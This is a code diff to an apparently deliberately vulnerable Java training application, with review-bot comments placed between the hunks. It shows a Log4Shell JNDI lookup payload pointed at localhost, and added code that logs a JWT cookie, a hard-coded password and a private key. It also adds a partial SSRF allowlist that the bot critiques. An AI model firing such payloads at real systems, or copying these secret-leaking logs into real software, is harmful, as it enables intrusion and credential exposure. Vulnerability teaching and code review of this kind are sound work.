diff --git a/src/main/java/org/joychou/controller/Jwt.java b/src/main/java/org/joychou/controller/Jwt.java
index f3e4c126..12bd9d6f 100644
--- a/src/main/java/org/joychou/controller/Jwt.java
+++ b/src/main/java/org/joychou/controller/Jwt.java
@@ -43,6 +43,7 @@ public String createToken(HttpServletResponse response, HttpServletRequest reque
 cookie.setPath("/");
 cookie.setSecure(true);
 response.addCookie(cookie);
+ logger.info("cookie is: {}", cookie);
 return "Add jwt token cookie successfully. Cookie name is USER_COOKIE";
 }
diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java
index b2ea4060..577f2efd 100644
--- a/src/main/java/org/joychou/controller/Log4j.java
+++ b/src/main/java/org/joychou/controller/Log4j.java
@@ -17,13 +17,19 @@ public class Log4j {
 */
 @RequestMapping(value = "/log4j")
 public String log4j(String token) {
- logger.error(token);
+ String result = getResponse(token);
+ String privateKey = "parivate";
+ logger.info("token: {}, privateKey: {}, result: {}", token, privateKey, result);
 return token;
 }
 public static void main(String[] args) {
 String poc = "${jndi:ldap://127.0.0.1:1389/0iun75}";
- logger.error(poc);
+ logger.info(poc);
+ String privateKey = "parivate";
+ if(StringUtils.isNotBlank(privateKey)) {
+ logger.error("token: {}, privateKey: {}", token, privateKey);
+ }
 }
 }
diff --git a/src/main/java/org/joychou/controller/Log4j2.java b/src/main/java/org/joychou/controller/Log4j2.java
new file mode 100644
index 00000000..2dcf1824
--- /dev/null
+++ b/src/main/java/org/joychou/controller/Log4j2.java
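Review bot: The added `logger.info("cookie is: {}", cookie);` hands the freshly issued JWT cookie to the application log at INFO; whether the token value itself ends up in the line depends on the cookie class's `toString`, but an authentication cookie should not be passed to the logger at all. If the intent is to record that the cookie was set, log only its non-secret attributes, e.g. `logger.info("cookie set: name={}, path={}, secure={}", cookie.getName(), cookie.getPath(), cookie.getSecure());`. createToken begins before this hunk, so the cookie's construction is not visible here.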
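Review bot: In `main`, the new `logger.error("token: {}, privateKey: {}", token, privateKey);` references `token`, which is not declared in that method (only `args`, `poc` and `privateKey` are in scope), so the file no longer compiles; `poc` is presumably what was meant. `getResponse(token)` and `StringUtils` are not visible in this hunk, so they must be defined and imported elsewhere in the file. Since the endpoint exists to show lookup substitution in the logged message, the `privateKey` local adds nothing to that and only places a secret-looking value in the log line; `logger.error("token: {}", poc);` covers the intended case.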
@@ -0,0 +1,36 @@
+
+package org.joychou.controller;
+
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+public class Log4j2 {
+
+ private static final Logger logger = LogManager.getLogger("Log4j2");
+
+ /**
+ * http://localhost:8080/log4j?token=${jndi:ldap://127.0.0.1:1389/0iun75}
+ * Default: error/fatal/off
+ * Fix: Update log4j to lastet version.
+ */
+ @RequestMapping(value = "/log4j")
+ public String log4j(String token) {
+ String password = "Pass@0rd";
+ logger.info("User password is " + password);
+ String privateKey = "parivate";
+ logger.info("paramaters is {}", new Object[]{privateKey});
+ if(StringUtils.isNotBlank(privateKey)) {
+ logger.error("something wrong, token: {}, privateKey: {}", token, privateKey);
+ }
+ return token;
+ }
+
+ public static void main(String[] args) {
+ String poc = "${jndi:ldap://127.0.0.1:1389/0iun75}";
+ logger.info(poc);
+ }
+
+}
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index f28b8b91..effc41e8 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -1,4 +1,6 @@
 package org.joychou.controller;
+import java.util.Arrays;
+import java.util.List;
 import cn.hutool.http.HttpUtil;
 import org.joychou.security.SecurityUtil;
diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java
index c1eac95c..4d7ab515 100644
--- a/src/main/java/org/joychou/util/HttpUtils.java
+++ b/src/main/java/org/joychou/util/HttpUtils.java
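Review bot: `StringUtils.isNotBlank(privateKey)` has no matching import in this new file (only LogManager, Logger, RequestMapping and RestController are imported), so it does not compile as committed; the import for whichever StringUtils the project already uses is needed. The handler is mapped to `@RequestMapping(value = "/log4j")`, the same path Log4j.java maps earlier in this diff; if both classes are registered as controllers, Spring refuses to start with an ambiguous-mapping error, so a distinct path such as `@RequestMapping(value = "/log4j2")` is needed. The hard-coded `password` and `privateKey` are written to the log at INFO, which is not required to demonstrate the lookup behaviour the Javadoc describes; the Javadoc also reads `lastet` for `latest`.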
@@ -32,6 +32,19 @@
 * @author JoyChou 2020-04-06
 */
 public class HttpUtils {
+ private static final List ALLOWED_URLS = Arrays.asList(
+ "http://example.com",
+ "http://another-allowed-url.com"
+ );
+
+ private static boolean isValidUrl(String url) {
+ try {
+ URI uri = new URI(url);
+ return ALLOWED_URLS.contains(uri.getScheme() + "://" + uri.getHost());
+ } catch (URISyntaxException e) {
+ return false;
+ }
+ }
 private final static Logger logger = LoggerFactory.getLogger(HttpUtils.class);
@@ -203,6 +216,9 @@ public static void IOUtils(String url) {
 public static String HttpAsyncClients(String url) {
+ if (!isValidUrl(url)) {
+ return "Invalid URL";
+ }
 CloseableHttpAsyncClient httpclient = HttpAsyncClients.createDefault();
 try {
 httpclient.start();
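Review bot: `isValidUrl` allowlists on `uri.getScheme() + "://" + uri.getHost()` only, so the port is unconstrained (a URL on an allowed host with any explicit port passes) and `ALLOWED_URLS` is a raw `List` where `List<String>` is meant. The check is applied only in `HttpAsyncClients` (second hunk); other fetchers in this class, such as the `IOUtils` named in that hunk's header, appear to stay unguarded, and unless redirect handling is disabled on the default client a 3xx from an allowed host still reaches an arbitrary target. No import hunk for this file is in the diff, so `List`, `Arrays`, `URI` and `URISyntaxException` must already be imported here; the `java.util.Arrays`/`java.util.List` imports added to SSRF.java look like they were intended for this file. A version of the check that rejects a missing scheme or host and includes the port:
```java
private static final List<String> ALLOWED_URLS = Arrays.asList(
// … unchanged: allowlist entries and closing ); …

private static boolean isValidUrl(String url) {
    try {
        URI uri = new URI(url);
        if (uri.getScheme() == null || uri.getHost() == null) {
            return false;
        }
        String origin = uri.getScheme() + "://" + uri.getHost()
                + (uri.getPort() == -1 ? "" : ":" + uri.getPort());
        return ALLOWED_URLS.contains(origin);
    } catch (URISyntaxException e) {
        return false;
    }
}
```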